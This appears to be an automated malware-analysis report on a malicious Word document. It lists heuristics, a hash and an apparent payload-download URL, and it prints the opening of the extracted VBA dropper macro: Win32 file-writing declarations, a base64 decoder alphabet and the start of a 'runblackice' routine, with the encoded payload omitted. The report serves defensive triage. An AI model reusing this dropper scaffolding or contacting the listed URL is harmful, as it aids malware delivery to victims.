Verdict: MALICIOUS (Risk Score: 64)

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a Microsoft Office document containing VBA macros. The macros appear to be obfuscated and attempt to download and execute a second-stage payload from the embedded URL http://www.wordwendang.com. The heap spray heuristic suggests exploitation of a memory corruption vulnerability.
Heuristics (4)

- Heap-spray pattern detected (severity: high, SC_HEAP_SPRAY): repeated 0x41 ("A") bytes found.
  Disassembly: attempted x86 opcode disassembly of the repeated bytes.
- VBA macros detected (severity: medium, OLE_VBA_MACROS): the document contains VBA macro code.
- Suspicious extracted artifact (severity: info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.wordwendang.com (in document text, OLE body)
  - http://www.wordwendang.com/templets/images/toplogo.gif (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9486 bytes |

SHA-256: acb34cc2552147e7ddb95089b61c89c94e3845fcb67bcb3948eb770f1b049a0f

Detection:
- ClamAV: no threats found
- Obfuscation or payload: likely (the carved artifact contains 15 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<!!blackice>
' Base64 alphabet used to decode the blobs embedded in the macro
Private Const base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
' Win32 file APIs (temp-path lookup, file creation and write), consistent with dropping a decoded file to disk
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function GetTempFileName Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpPathName As String, ByVal lpPrefixString As String, ByVal uUnique As Long, ByVal lpTempFileName As String) As Long

Private Sub runblackice()
    On Error Resume Next
    ' filestring is then built by concatenating the 15 long base64-like blobs
    ' (the encoded payload, omitted from this listing)
```